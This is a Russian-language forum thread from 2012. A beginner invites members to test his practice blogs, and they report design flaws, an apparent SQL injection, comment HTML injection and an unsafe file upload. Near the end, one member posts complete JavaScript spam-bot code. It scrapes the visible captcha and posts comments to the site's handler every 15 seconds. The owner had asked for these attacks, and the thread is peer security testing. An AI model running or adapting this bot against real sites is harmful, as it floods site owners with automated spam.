Спустя 10 минут, 46 секунд (24.03.2012 - 21:11) bposter написал(а):
о вижу попытки в коментарии впихнуть <b>i</b><b. 
Спустя 1 минута, 3 секунды (24.03.2012 - 21:12) ADiel написал(а):
Увидел лого очень похожее на vk, сразу закрыл.
+ какие то жуки ползают, отвлекают от текста.. Это вторая причина моментального выхода
+ какие то жуки ползают, отвлекают от текста.. Это вторая причина моментального выхода
Спустя 2 минуты (24.03.2012 - 21:14) ADiel написал(а):
| Цитата |
| You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ffff' ); < / script >','2012-03-24','22:14:41')' at line 1 |
Спустя 17 секунд (24.03.2012 - 21:15) bposter написал(а):
| Цитата (ADiel @ 24.03.2012 - 18:12) |
| Увидел лого очень похожее на vk, сразу закрыл. + какие то жуки ползают, отвлекают от текста.. Это вторая причина моментального выхода |
ну лого дажи и небыло в мыслях вк уменя там даже акаунта нету, а насчет жуков уменя хуть одни жуки а к другим зайди полчаса ищиш где сам контент
Спустя 1 минута, 28 секунд (24.03.2012 - 21:16) bposter написал(а):
| Цитата (ADiel @ 24.03.2012 - 18:14) | ||
|
это че?
Спустя 6 минут, 23 секунды (24.03.2012 - 21:22) Placido написал(а):
Длинное слово в комментарии, и страница превращается в хз что:
http://blog-46.ru/post.php?rew=69
http://blog-46.ru/post.php?rew=69
Спустя 33 секунды (24.03.2012 - 21:23) ADiel написал(а):
| Цитата (bposter @ 24.03.2012 - 18:16) | ||||
это че? |
Уязвимость. Возможность sql injection
Спустя 1 минута, 20 секунд (24.03.2012 - 21:24) bposter написал(а):
| Цитата (Placido @ 24.03.2012 - 18:22) |
| Длинное слово в комментарии, и страница превращается в хз что: http://blog-46.ru/post.php?rew=69 |
да об этом и не подумал
надо в css поставить обрезку Спустя 49 секунд (24.03.2012 - 21:25) bposter написал(а):
| Цитата (ADiel @ 24.03.2012 - 18:23) | ||||||
Уязвимость. Возможность sql injection |
это через коменты?
Спустя 2 минуты, 2 секунды (24.03.2012 - 21:27) Placido написал(а):
После регистрации введенное имя остается в левом верхнем углу страницы.
Спустя 2 минуты, 59 секунд (24.03.2012 - 21:30) bposter написал(а):
| Цитата (Placido @ 24.03.2012 - 18:27) |
| После регистрации введенное имя остается в левом верхнем углу страницы. |
ага точно не заметил будем исправлять или возможно переписывать все с нуля в зависимости от количества найденых косяков
Спустя 1 минута, 23 секунды (24.03.2012 - 21:31) nugle написал(а):
bposter
через css не сделаешь, тут нужно текст делить средствами php
через css не сделаешь, тут нужно текст делить средствами php
Спустя 16 минут, 16 секунд (24.03.2012 - 21:48) bposter написал(а):
вобщем надо переделывать ато тут и коментприями заспамили 
, вобщем все ясно всем спасибо
, вобщем все ясно всем спасибо Спустя 23 минуты, 13 секунд (24.03.2012 - 22:11) sebastjan написал(а):
По дизу.
Блок с надписью- читать далее не понятно к верху или низу.
Форматирование хреновое.
Дзайна как такого нет.
Заголовки с наклоном -типа фишка такая? Погрызенно смотрятся.
Лого (В) ни очём не говорит.
правя колонка хрен знает с чем выровнена, мог бы подровнять с синей полосй начало кнопок.
Лично для меня текст плохо читается под заголовком
Блок с надписью- читать далее не понятно к верху или низу.
Форматирование хреновое.
Дзайна как такого нет.
Заголовки с наклоном -типа фишка такая? Погрызенно смотрятся.
Лого (В) ни очём не говорит.
правя колонка хрен знает с чем выровнена, мог бы подровнять с синей полосй начало кнопок.
Лично для меня текст плохо читается под заголовком
| Цитата |
| Все самое интересное в мире и сети интернет. |
светло -оранжевый с наклоном.
Читать далее >> считают плохим способом , тем более не подчёркнута ссылка.
При наведении на кнопки правого меню, хрен прочитаешь что там.
После нажатия на регистацию - разворот блока регистрации, а если я передумал, так и будет висеть.
Резюме.
Очередной инет мусор.
Спустя 6 минут, 5 секунд (24.03.2012 - 22:17) bposter написал(а):
это не мусор 
это практика, насчет реги можно использовать действие не клик а наведения а когда фокус теряется форма сварачивается, ну опятьже я на оскар не претендую это ради практики
это практика, насчет реги можно использовать действие не клик а наведения а когда фокус теряется форма сварачивается, ну опятьже я на оскар не претендую это ради практики Спустя 2 минуты, 39 секунд (24.03.2012 - 22:20) sebastjan написал(а):
bposter
Да не бери в голову, понятное дело что практика.
Я сам очень критичен к своим творениям, ну и к чужим тоже.
Да не бери в голову, понятное дело что практика.
Я сам очень критичен к своим творениям, ну и к чужим тоже.
Спустя 7 минут, 36 секунд (24.03.2012 - 22:27) sebastjan написал(а):
Почему у IMG нет Альтов?
Спустя 1 минута, 35 секунд (24.03.2012 - 22:29) ADiel написал(а):
И почему переименованный php загружает как png ?
Спустя 5 минут, 16 секунд (24.03.2012 - 22:34) bposter написал(а):
Ну вот такой я мастер (пока)
Спустя 3 минуты, 12 секунд (24.03.2012 - 22:37) sebastjan написал(а):
Почитай про фармотировани.
Не зачем писать всю фразу заглавными, это не грамотно.
Не зачем писать всю фразу заглавными, это не грамотно.
| Цитата |
| ОТЕЦ РУССКОЙ АВИАЦИИ |
Есть масса других грамотных способов акцентировать.
Если ставишь дату публикование под текстом - делай это красиво а не так чтоб зрение сломать.
Спустя 51 секунда (24.03.2012 - 22:38) sebastjan написал(а):
bposter
Так мы все чему то учимся.
Вот теперь фронт работы у тебя есть.
Так мы все чему то учимся.
Вот теперь фронт работы у тебя есть.
Спустя 13 минут, 47 секунд (24.03.2012 - 22:52) bposter написал(а):
| Цитата (sebastjan @ 24.03.2012 - 19:38) |
| bposter Вот теперь фронт работы у тебя есть. |
Это точно
этот сайт пущю на запчасти и буду новый пробывать делать Спустя 21 минута, 34 секунды (24.03.2012 - 23:14) ADiel написал(а):
Вообще пробы пера это хорошо, но не публикуйте это... Рано. На форуме можно дать посмотреть, но не более.
Спустя 12 минут, 59 секунд (24.03.2012 - 23:27) bodja написал(а):
Ну все в лучший традициях,молодец!!!
Аякс от ирбиса стоит допилить,и использовать более полно,
причем настолько,что не прийдется ПХП напрягать насчет контента и шаблона
капча сдается мне слабенькой,хотя на первой и этого хватит.
А так ,хороший спамер найдет вот это '&cap='+txt4;
Диз да ,стремный ,есть замечательные бесплатные шаблоны.
А в целом мне нравится.
Аякс от ирбиса стоит допилить,и использовать более полно,
причем настолько,что не прийдется ПХП напрягать насчет контента и шаблона
капча сдается мне слабенькой,хотя на первой и этого хватит.
А так ,хороший спамер найдет вот это '&cap='+txt4;
Диз да ,стремный ,есть замечательные бесплатные шаблоны.
А в целом мне нравится.
Спустя 46 минут, 17 секунд (25.03.2012 - 00:13) bposter написал(а):
| Цитата (ADiel @ 24.03.2012 - 20:14) |
| но не публикуйте это... |
не совсем понял
Спустя 10 часов, 31 минута, 29 секунд (25.03.2012 - 10:44) VELIK505 написал(а):
не открывается
Спустя 11 часов, 34 минуты, 20 секунд (25.03.2012 - 22:19) sebastjan написал(а):
Будет обновление или новый сайт, выставляй.
Спустя 2 дня, 13 часов, 56 минут, 21 секунда (28.03.2012 - 12:15) bposter написал(а):
окей
Спустя 3 минуты, 16 секунд (28.03.2012 - 12:18) bposter написал(а):
| Цитата (VELIK505 @ 25.03.2012 - 07:44) |
| не открывается |
сам тока седня увидел...не знаю почему написал в потдержку
Спустя 13 дней, 3 часа, 58 минут, 51 секунда (11.04.2012 - 16:17) bposter написал(а):
Всем привет, в прошлый раз я просил потестить сайт www.blog-46.ru и модуль комментариев оказался не гуд, в этот раз начал делать новый сайт но сам сайт еще делать и делать но на этой стадии хотел бы чтоб потестели модуль комментариев, я учел все прошлые ошибки и модернизировал модуль хотелось бы чтоб по полной протест новый скрипт по адресу http://blog-49.ru капчю пока не стал делать так как это дело техники и его прикрутить можно и попозже счас жду злостных атак на форму
Спустя 20 часов, 11 минут, 8 секунд (12.04.2012 - 12:28) bodja написал(а):
Отлично,а где форма 
Спустя 7 минут, 41 секунда (12.04.2012 - 12:36) bposter написал(а):
Спрятана
Спустя 4 минуты, 10 секунд (12.04.2012 - 12:40) Winston написал(а):
| Цитата (bposter @ 11.04.2012 - 16:17) |
| счас жду злостных атак на форму |
Спустя 4 минуты (12.04.2012 - 12:44) bposter написал(а):
Пробуй еще я изменил настройки 
Спустя 42 секунды (12.04.2012 - 12:45) bodja написал(а):
| Цитата |
| Спрятана |
Я не понял - это защита от кого?
Спустя 50 секунд (12.04.2012 - 12:46) Winston написал(а):
bposter
No problem
No problem
Спустя 1 минута, 27 секунд (12.04.2012 - 12:47) bposter написал(а):
Блин как так уменяж стоит ограничения на POST запросы не чаще чем раз в 15 сек
Спустя 50 секунд (12.04.2012 - 12:48) bodja написал(а):
| Цитата |
| query = 'author='+txt1+'&mail='+txt2+'&tex='+txt3+'&idpost='+txt4 +'&kat='+txt5+'&title='+txt6+'&url='+txt7; |
Спустя 1 минута, 4 секунды (12.04.2012 - 12:49) Winston написал(а):
Видимо не там у тебя стоит
Спустя 4 минуты, 49 секунд (12.04.2012 - 12:54) bposter написал(а):
| Цитата (bodja @ 12.04.2012 - 09:45) | ||
Я не понял - это защита от кого? |
Не защита просто так удобней мне кажется хочеш добавить комент нажал получил форму
Спустя 2 минуты, 10 секунд (12.04.2012 - 12:56) bposter написал(а):
| Цитата (Winston @ 12.04.2012 - 09:49) |
| Видимо не там у тебя стоит |
Как не там защита подключена в файле который отвечает за запись коментариев в базу, если в ручную пробывать часто добавлять то защита срабатывает
Спустя 3 минуты, 17 секунд (12.04.2012 - 12:59) bodja написал(а):
bposter
Я бы на вашем месте припрятал бы код в отдельный фай,прогнал бы через оптимизатор и обусфактор ,подгружал часть скрипта через тотже аякс генерируя динамику через ПХП и уже тогда выполнял.
А так тут все на виду.
Это конечно тоже не панацея но Winston-а заставил бы голову сломать.
Я бы на вашем месте припрятал бы код в отдельный фай,прогнал бы через оптимизатор и обусфактор ,подгружал часть скрипта через тотже аякс генерируя динамику через ПХП и уже тогда выполнял.
А так тут все на виду.
Это конечно тоже не панацея но Winston-а заставил бы голову сломать.
| Цитата |
| если в ручную пробывать часто добавлять то защита срабатывает |
Ну и? Будет бот писать через каждые 15 сек,дальше что?
Спустя 49 секунд (12.04.2012 - 13:00) Winston написал(а):
| Цитата (bposter @ 12.04.2012 - 12:56) |
| Как не там защита подключена в файле который отвечает за запись коментариев в базу |
Значит какая то кривая защита
Спустя 2 минуты, 18 секунд (12.04.2012 - 13:02) bposter написал(а):
Не с защитой разобрался просто на локалхосте такой путь конает require_once('antibot.php'); а на серваке не канает тока так надо require_once('./components/comments/antibot.php');
Спустя 3 минуты, 26 секунд (12.04.2012 - 13:06) bposter написал(а):
| Цитата (bodja @ 12.04.2012 - 09:59) | ||
| bposter Я бы на вашем месте припрятал бы код в отдельный фай,прогнал бы через оптимизатор и обусфактор ,подгружал часть скрипта через тотже аякс генерируя динамику через ПХП и уже тогда выполнял. А так тут все на виду. Это конечно тоже не панацея но Winston-а заставил бы голову сломать.
Ну и? Будет бот писать через каждые 15 сек,дальше что? |
Капчю прикручю и тогда думаю будет вообще гуд + я еще не задействовал в антиботе еще бан по IP еще подумаю стоитли
Спустя 1 минута, 3 секунды (12.04.2012 - 13:07) Winston написал(а):
| Цитата (bposter @ 12.04.2012 - 13:02) |
| Не с защитой разобрался |
Теперь камменты не добавляются даже вручную, только индикатор загрузки на сек. выскакивает и все.
Спустя 3 минуты, 43 секунды (12.04.2012 - 13:11) bposter написал(а):
исправил, а как вы добавляете комент напрямую в обработчик?
Спустя 1 минута, 38 секунд (12.04.2012 - 13:12) Winston написал(а):
Мда, как флудил так и флужу
Спустя 1 день, 7 часов, 43 минуты, 33 секунды (13.04.2012 - 20:56) bposter написал(а):
Немного усовершенствовал скрипт теперь думаю злостный спамер не прорвется тестить тут http://blog-49.ru
тестить тут http://blog-49.ru Спустя 20 минут, 37 секунд (13.04.2012 - 21:16) Winston написал(а):
"Ваш комментарий успешно добавлен"
Во первых после успешного постинга сообщение, поля нужно очищать
Во вторых цифры нужно менять!
Во первых после успешного постинга сообщение, поля нужно очищать
Во вторых цифры нужно менять!
Спустя 2 минуты, 36 секунд (13.04.2012 - 21:19) bposter написал(а):
Ну насчет цифр не знаю это надо страницу обновлять тогда Та и зачем цифры обновлять человек ввел их один раз и пусть себе комментирует еще раз если хочет зачем его напрягать
Спустя 12 минут, 8 секунд (13.04.2012 - 21:31) Winston написал(а):
| Цитата (bposter @ 13.04.2012 - 21:19) |
| Та и зачем цифры обновлять человек ввел их один раз и пусть себе комментирует еще раз если хочет зачем его напрягать |
Вот я немного освобожусь и покажу тебе, что ты заблуждаешься в этом мнении
Спустя 1 минута, 46 секунд (13.04.2012 - 21:33) bposter написал(а):
Жду не дождусь
Спустя 23 часа, 20 минут, 9 секунд (14.04.2012 - 20:53) bodja написал(а):
| Цитата |
| Жду не дождусь |
Дождались :D
Вот здесь он сейчас клепает вам.
http://blog-49.ru/article/full/114
Неслушаете вы моих советов.
Вот код бота ,который сейчас издевается.
Угадываете свой собственный код? ;)
<html><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<script type="text/javascript">
function el(el){
return document.getElementById(el);
}
try {
ax = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
ax = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
ax = false;
}
}
if (!ax && typeof XMLHttpRequest!='undefined') {
ax = new XMLHttpRequest();
}
function _(get,post,code) {
ax.open('post', get , true);
ax.onreadystatechange = function () {
if(ax.readyState == 4 ) {var data=ax.responseText;if(data){eval(code);}}
}
ax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
ax.send(post);
}
function bot(url) {
_('http://blog-49.ru/article/full/114',null,'document.getElementById(\'content\').innerHTML=data;parse();')
}
function parse(){
//alert(document.getElementsByTagName('table')[1].getElementsByTagName('b')[0].innerHTML);
Pusk();
}
/////Собераем все элементы формы которые будем отправлять
function Pusk()
{
var query;
var txt1 = encodeURIComponent('bot');
var txt2 = encodeURIComponent('bot@bot.com');
var txt3 = encodeURIComponent('spam bot'+(Math.random() * (100 - 1) + 1));
var txt4 = encodeURIComponent(el('idpost').value);
var txt5 = encodeURIComponent(el('kat').value);
var txt6 = encodeURIComponent(el('title').value);
var txt7 = encodeURIComponent(el('url').value);
var txt9 = encodeURIComponent(el('pin2').value);
var txt8 = document.getElementsByTagName('table')[1].getElementsByTagName('b')[0].innerHTML;
query = 'author='+txt1+'&mail='+txt2+'&tex='+txt3+'&idpost='+txt4+'&kat='+txt5+'&title='+txt6+'&url='+txt7+'&pin='+txt8+'&pin2='+txt8;
//alert(query);
//Request(query);
_('http://blog-49.ru/components/comments/add_comments.php',query,'');
setTimeout(bot,15000);
}
</script>
</head>
<body onLoad="bot();">
<div id="content"></div>
<div id="pass"></div>
</body>
</html>
Скопируйте и запустите в ИE6.
ЗЫ А я все думаю,за что я люблю ИЕ6 :D :D :D
Спустя 1 час, 8 минут, 24 секунды (14.04.2012 - 22:01) bposter написал(а):
Я обязательно займусь этим иначе зачем я тогда выкладывал этовсе, но счас другая головная боль подепил вирус который по FTP (тотал командер) все сайты загадил левым кодом, счас востановлюсь и вернусь к своему сайту, и спасибо за подсказки и за спам тоже )))
_____________
Вязание xe4.ru спицами.
Сайт для тестов (подопытный №543)